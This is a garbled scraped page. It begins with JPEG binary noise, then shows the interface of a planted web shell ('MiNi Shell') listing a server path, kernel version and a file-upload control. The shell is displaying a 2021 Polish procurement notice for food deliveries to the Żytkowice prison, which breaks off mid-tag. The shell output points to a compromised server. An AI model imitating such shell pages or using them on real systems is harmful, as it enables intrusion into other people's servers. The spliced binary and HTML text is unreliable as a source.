JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20210630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20210630/0010029301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00100293 z dnia 2021-06-30</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy artykułów spożywczych, konserw, wędlin, oraz mięsa i drobiu do Zakładu Karnego w Żytkowicach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD KARNY W ŻYTKOWICACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001038200</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żytkowice 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Garbatka-Letnisko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-930</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 666 10 00</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">48 61 46 030</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_zytkowice@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy artykułów spożywczych, konserw, wędlin, oraz mięsa i drobiu do Zakładu Karnego w Żytkowicach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-45de3595-d99f-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00100293</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00016425/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawy artykułów spożywczych</p> <p class="mb-0">1.2.2 Dostawy mięsa, wędlin i drobiu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zk_zytkowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zk_zytkowice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje o środkach komunikacji elektronicznej, przy użyciu których Zamawiajacy będzie komunikował się z Wykonawcami zawarte są w rozdziale XVI SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informację odnośnie RODO zawarte są w rozdziale XXXVIII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informację odnośnie RODO zawarte są w rozdziale XXXVIII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DKW.2232.1.1.2021.DB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I: Dostawy artykułów spożywczych<br/><br/>1	barszcz biały w proszku	kg, ilość gwarantowana:	28, ilość opcjonalna:	12	15891900-0	opakowanie jednostkowe maks. 10 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>2.	bulion w kostce drobiowy	kg, ilość gwarantowana:	17,5, ilość opcjonalna:	7,5	15891500-5	opakowanie jednostkowe maks. 10 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>3.	chrzan tarty	kg, ilość gwarantowana:	52,5, ilość opcjonalna:	22,5	15871000-4	opakowanie jednostkowe: słoiki szklane maks. 1 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>4.	cukier	kg, ilość gwarantowana:	770, ilość opcjonalna:	330<br/>	15831000-2 opakowanie jednostkowe maks. 5 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>5.	cynamon	kg, ilość gwarantowana:	3,5, ilość opcjonalna: 1,5<br/>	15870000-7	termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>6.	czosnek granulowany	kg, ilość gwarantowana:	7, ilość opcjonalna: 3<br/>	15870000-7	termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>7.	fasola biała	Kg, ilość gwarantowana:	420, ilość opcjonalna: 180<br/>	15331131-4	opakowanie jednostkowe maks. 5 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>8.	filet śledziowy w zalewie	Kg, ilość gwarantowana:	42, ilość opcjonalna: 18<br/>	15241200-1	w zalewie octowej, opakowanie jednostkowe maks. 5 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>9.	groch łupany	kg, ilość gwarantowana:	420, ilość opcjonalna:	180<br/>	15331133-8	opakowanie jednostkowe maks. 5 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>10.	groszek konserwowy	kg, ilość gwarantowana:	105, ilość opcjonalna:	45<br/>	15331400-1	opakowanie jednostkowe maks. 3 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>11.	herbata granulowana	kg, ilość gwarantowana:	42, ilość opcjonalna:	18<br/>	15863200-7	opakowanie jednostkowe maks. 10 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>12.	kasza gryczana	kg, ilość gwarantowana:	175, ilość opcjonalna:	75<br/>	15613300-1	opakowanie jednostkowe worek maks. 25 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>13.	kasza jęczmienna	kg, ilość gwarantowana:	1400, ilość opcjonalna:	<br/>600	15613300-1	opakowanie jednostkowe worek maks. 25 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>14	.kasza manna	kg, ilość gwarantowana:	210, ilość opcjonalna:	<br/>90<br/>	15613300-1	opakowanie jednostkowe worek maks. 25 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>15.	kawa zbożowa	kg, ilość gwarantowana:	210, ilość opcjonalna:	<br/>90	15862000-8	opakowanie jednostkowe maks. 10 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>16.	ketchup	kg, ilość gwarantowana:	52,50, ilość opcjonalna:	22,50<br/>	15871230-5	opakowanie jednostkowe: butelki z tworzywa sztucznego maks. 1 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>17.	koncentrat pomidorowy	kg, ilość gwarantowana:	560, ilość opcjonalna:	<br/>240	15331427-6	opakowanie jednostkowe maks. 2 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>18.	kotlet rybny mrożony	kg, ilość gwarantowana:	490, ilość opcjonalna:	210<br/>	15229000-9	termin przydatności do spożycia min. 60 dni od dnia dostawy,<br/>19.	kotlety sojowe	kg, ilość gwarantowana:	140, ilość opcjonalna:	<br/>60<br/>	15800000-6	opakowanie jednostkowe maks. 10 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>20.	kukurydza konserwowa	kg, ilość gwarantowana:	105, ilość opcjonalna:	45<br/>	15331400-1	opakowanie jednostkowe maks. 3 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>21.	leczo pieczarkowe	kg, ilość gwarantowana:	315, ilość opcjonalna:	<br/>135	15894300-4	opakowanie jednostkowe 1 kg: słoiki szklane, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>22.	liść laurowy	kg, ilość gwarantowana:	14, ilość opcjonalna:	<br/>6<br/>	15870000-7	termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>23.	majeranek	kg, ilość gwarantowana:	14, ilość opcjonalna:	<br/>6<br/>	15870000-7	termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>24.	majonez	kg, ilość gwarantowana:	91, ilość opcjonalna:	<br/>39<br/>	15871273-8	opakowanie jednostkowe maks. 2 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>25.	makaron	kg, ilość gwarantowana:	1890, ilość opcjonalna:	<br/>810	15851100-9	opakowanie jednostkowe maks. 5 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>26.	marmolada wieloowocowa	kg, ilość gwarantowana:	1050, ilość opcjonalna:	<br/>450	15332230-5	opakowanie jednostkowe maksymalnie 15 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>27.	mąka pszenna typ 550	kg, ilość gwarantowana:	490, ilość opcjonalna:	<br/>210	15612100-2	opakowanie jednostkowe worek maks. 25 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>28.	mąka ziemniaczana	kg, ilość gwarantowana:	245, ilość opcjonalna:	<br/>105	15623000-1	opakowanie jednostkowe worek maks. 25 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>29.	musztarda	kg, ilość gwarantowana:	105, ilość opcjonalna:	<br/>45	15871250-1	opakowanie jednostkowe: butelki z tworzywa sztucznego maks. 1 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>30.	ocet	l, ilość gwarantowana:	70, ilość opcjonalna:	<br/>30	15871100-5	ocet spirytusowy, opakowanie jednostkowe maks. 1 l, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>31.	olej roślinny	l, ilość gwarantowana:	175, ilość opcjonalna:	<br/>75	15411200-4	opakowanie jednostkowe maks. 5 l, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>32.	papryka konserwowa	kg, ilość gwarantowana:	140, ilość opcjonalna:	<br/>60	15331400-1	opakowanie jednostkowe: słoik szklany maks. 1 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>33.	papryka ostra (przyprawa)	kg, ilość gwarantowana:	14, ilość opcjonalna:	6<br/>	15870000-7	termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>34.	pieprz czarny mielony kg, ilość gwarantowana:	14, ilość opcjonalna:	<br/>6<br/>	15870000-7	termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>35.	pieprz ziołowy	kg, ilość gwarantowana:	14, ilość opcjonalna:	6<br/>	15870000-7	termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>36.	płatki kukurydziane	kg, ilość gwarantowana:	56	, ilość opcjonalna: 24	15613311-1	opakowanie jednostkowe maks. 5 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>37.	płatki owsiane	kg, ilość gwarantowana:	210, ilość opcjonalna:	90	15613380-5	opakowanie jednostkowe worek maks. 25 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>38.	przyprawa do bigosu kg, ilość gwarantowana:	7, ilość opcjonalna:	3<br/>	15871270-7	termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>39.	przyprawa do kurczaka	Kg, ilość gwarantowana:	7, ilość opcjonalna:	3<br/>	15871270-7	termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>40.	przyprawa do zup w płynie	l, ilość gwarantowana:	122,50, ilość opcjonalna:	52,50	15871270-7	opakowanie jednostkowe: butelka z tworzywa sztucznego o pojemności maks. 2 litry, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>41.	przyprawa warzywna sypka	kg, ilość gwarantowana:	122,50, ilość opcjonalna:	52,50<br/>	15871270-7	opakowanie jednostkowe maks. 10 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>42.	ryż długoziarnisty	kg, ilość gwarantowana:	1750, ilość opcjonalna: 750	15611000-4	opakowanie jednostkowe worek maks. 25 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>43.	sałatka z kapusty konserwowej kg, ilość gwarantowana:	210, ilość opcjonalna:	90	<br/>15331400-1	opakowanie jednostkowe maks. 1 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>44.	Sól	Kg, ilość gwarantowana:	350, ilość opcjonalna:	150	15872400-5	opakowanie jednostkowe maks. 25 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>45.	suchary	Kg, ilość gwarantowana:	17,50, ilość opcjonalna:	7,50	15821150-5	opakowanie jednostkowe maks. 0,5 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>46.	woda butelkowana op. 0,5 l	l, ilość gwarantowana:	280, ilość opcjonalna:	120	15981000-8	mineralna bądź źródlana, opakowanie jednostkowe: 0,5 l. termin przydatności do spożycia min. 60 dni od dnia dostawy<br/>47.	ziele angielskie	kg, ilość gwarantowana:	14, ilość opjconalna:	6	15870000-7	całe ziarna, nie zmielone, suszone, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>48.	zupa w proszku pieczarkowa	kg, ilość gwarantowana:	56, ilość opcjonalna:	24	15891900-0	opakowanie jednostkowe maks. 10 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>49.	zupa w proszku porowa	kg, ilość gwarantowana:	21	, ilość opcjonalna: 9	15891900-0	opakowanie jednostkowe maks. 10 kg, termin przydatności do spożycia min. 30 dni od dnia dostawy<br/>50.	woda butelkowana op. 1,5 l	l, ilość gwarantowana:	560, ilość opcjonalna:	240	15981000-8	mineralna, opakowanie jednostkowe: 1,5 l. termin przydatności do spożycia min. 60 dni od dnia dostawy<br/>51.	wafle ryżowe bezglutenowe	kg, ilość gwarantowana:	35, ilość opcjonalna:	15<br/>	15614000-5	Opakowanie jednostkowe 100-130 g </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15851100-9 - Makaron niegotowany</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331131-4 - Fasola przetworzona</p> <p class="mb-0">15611000-4 - Ryż łuskany</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Po wyczerpaniu zamówienia gwarantowanego Zamawiający rozpocznie realizację zamówienia opcjonalnego w ilościach podanych w rozdziale IV SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Zamawiający oceni i porówna jedynie te oferty, które: zostaną złożone przez Wykonawców nie wykluczonych przez Zamawiajacego, oraz nie zostaną odrzucone<br/>2) ofertą najkorzystniejszą będzie oferta Wykonawcy, który oprócz spełnienia warunków formalnych przedłoży najkorzystniejszą ofertę uzyskującą w klasyfikacji punktowej najwyższy bilans punktowy kryteriów wyboru oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ NR II: Dostawy konserw<br/><br/>Lp.	Produkt	j.m. Ilość gwarantowana	Ilość opcjonalna	Kod CPV	Opis<br/>1	konserwa wieprzowa	kg, ilość gwarantowana:	770, ilość opcjonalna:	330 15131000-5 opakowanie jednostkowe 300-330g; puszka stalowa z wieczkiem łatwo otwieralnym lub opakowanie typu alupak, termin przydatności do spożycia min. 6 miesięcy od dnia dostawy<br/>2	paprykarz	kg, ilość gwarantowana: 700, ilość opcjonalna: 300	15243000-3	opakowanie jednostkowe maks. 350 g: puszka stalowa z wieczkiem łatwo otwieralnym lub opakowanie typu alupak, termin przydatności do spożycia min. 6 miesięcy od dnia dostawy,<br/>3	pasztecik drobiowy	kg, ilość gwarantowana: 420,, ilość opcjonalna:	<br/>180	15131310-1	opakowanie jednostkowe ok. 130 g: puszka stalowa z wieczkiem łatwo otwieralnym lub opakowanie typu alupak, termin przydatności do spożycia min. 6 miesięcy od dnia dostawy,<br/>4	szprot w oleju kg, ilość gwarantowana: 245, , ilość opcjonalna:	105	15241000-9	opakowanie jednostkowe 300-330 g: puszka stalowa z wieczkiem łatwo otwieralnym lub opakowanie typu alupak, termin przydatności do spożycia min. 6 miesięcy od dnia dostawy,<br/>5	szprot w pomidorach kg, ilość gwarantowana:	280, ilość opcjonalna: 120	15241000-9	opakowanie jednostkowe 300-330 g: puszka stalowa z wieczkiem łatwo otwieralnym lub opakowanie typu alupak, termin przydatności do spożycia min. 6 miesięcy od dnia dostawy, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15131000-5 - Konserwy i przetwory z mięsa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15241000-9 - Ryby w folii lub puszkowane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Po wyczerpaniu zamówienia gwarantowanego Zamawiający rozpocznie realizację zamówieni opcjonalnego przedmiotu zamówienia w ilościach podanych w rozdziale IV SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Zamawiający oceni i porówna jedynie te oferty, które: zostaną złożone przez Wykonawców nie wykluczonych przez Zamawiajacego, oraz nie zostaną odrzucone<br/>2) ofertą najkorzystniejszą będzie oferta Wykonawcy, który oprócz spełnienia warunków formalnych przedłoży najkorzystniejszą ofertę uzyskującą w klasyfikacji punktowej najwyższy bilans punktowy kryteriów wyboru oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 